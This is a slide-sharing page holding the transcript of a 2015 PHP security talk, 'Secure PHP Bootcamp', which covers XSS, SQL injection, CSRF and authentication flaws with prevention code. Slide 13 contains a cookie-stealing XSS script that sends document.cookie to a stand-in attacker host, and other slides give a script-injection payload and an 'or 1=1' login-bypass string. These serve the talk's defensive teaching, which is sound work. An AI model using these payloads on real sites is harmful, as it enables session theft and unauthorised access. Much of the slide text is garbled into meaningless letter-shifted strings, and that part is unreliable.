Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

Avatar for Chris Cornutt Chris Cornutt
January 23, 2015
Technology
0
690

Secure PHP Bootcamp

Given at PHP Benelux 2015

Avatar for Chris Cornutt

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
180
Pentesting for Developers
Avatar for Chris Cornutt ccornutt
0
170
Securing Legacy Applications - Longhorn PHP 2018
Avatar for Chris Cornutt ccornutt
1
210
Pieces of Auth
Avatar for Chris Cornutt ccornutt
0
370
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
550
Build Security In
Avatar for Chris Cornutt ccornutt
0
250
Introduction to Slim 3
Avatar for Chris Cornutt ccornutt
0
190
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
32
PHP Security, Redfined
Avatar for Chris Cornutt ccornutt
0
310

Other Decks in Technology

See All in Technology
Next.js 16の新機能 Cache Components について
Avatar for sutetotanuki sutetotanuki
0
210
Introduction to Bill One Development Engineer
Avatar for Sansan, Inc. sansan33
PRO
0
340
Claude Codeを使った情報整理術
Avatar for 西岡 賢一郎 (Kenichiro Nishioka) knishioka
17
11k
2025年のデザインシステムとAI 活用を振り返る
Avatar for Tech Leverages leveragestech
0
670
プロンプトエンジニアリングを超えて:自由と統制のあいだでつくる Platform × Context Engineering
Avatar for yuriemori yuriemori
0
110
ソフトウェアエンジニアとAIエンジニアの役割分担についてのある事例
Avatar for KNOWLEDGE WORK / 株式会社ナレッジワーク kworkdev
PRO
1
360
善意の活動は、なぜ続かなくなるのか ーふりかえりが"構造を変える判断"になった半年間ー
Avatar for matsukurou matsukurou
0
170
AI との良い付き合い方を僕らは誰も知らない (WSS 2026 静岡版)
Avatar for Asei Sugiyama asei
1
160
2025年 山梨の技術コミュニティを振り返る
Avatar for しみず ゆうき yuukis
0
140
コールドスタンバイ構成でCDは可能か
Avatar for 平目 hiramax
0
130
Scrum Guide Expansion Pack が示す現代プロダクト開発への補完的視点
Avatar for Sonjin Yamamoto sonjin
0
280
「アウトプット脳からユーザー価値脳へ」がそんなに簡単にできたら苦労しない #RSGT2026
Avatar for Aki / @LoveIdahoBurger aki_iinuma
6
2.7k

Featured

See All Featured
Introduction to Domain-Driven Design and Collaborative software design
Avatar for Kenny Baas-Schwegler baasie
1
530
svc-hook: hooking system calls on ARM64 by binary rewriting
Avatar for Akira Moroo retrage
1
43
Have SEOs Ruined the Internet? - User Awareness of SEO in 2025
Avatar for Akash Hashmi akashhashmi
0
220
How to Ace a Technical Interview
Avatar for Jacob Kaplan-Moss jacobian
281
24k
Designing Experiences People Love
Avatar for Jonathan Moore moore
143
24k
Tell your own story through comics
Avatar for letsgokoyo letsgokoyo
0
770
Fashionably flexible responsive web design (full day workshop)
Avatar for Andy Clarke malarkey
408
66k
Lightning Talk: Beautiful Slides for Beginners
Avatar for Ines Montani inesmontani
PRO
1
410
My Coaching Mixtape
Avatar for mlcsv mlcsv
0
20
Claude Code どこまでも/ Claude Code Everywhere
Avatar for nwiizo nwiizo
61
51k
Put a Button on it: Removing Barriers to Going Fast.
Avatar for kastner kastner
60
4.1k
Organizational Design Perspectives: An Ontology of Organizational Design Elements
Avatar for Dr. Kim W Petersen kimpetersen
PRO
0
48

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

  20. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN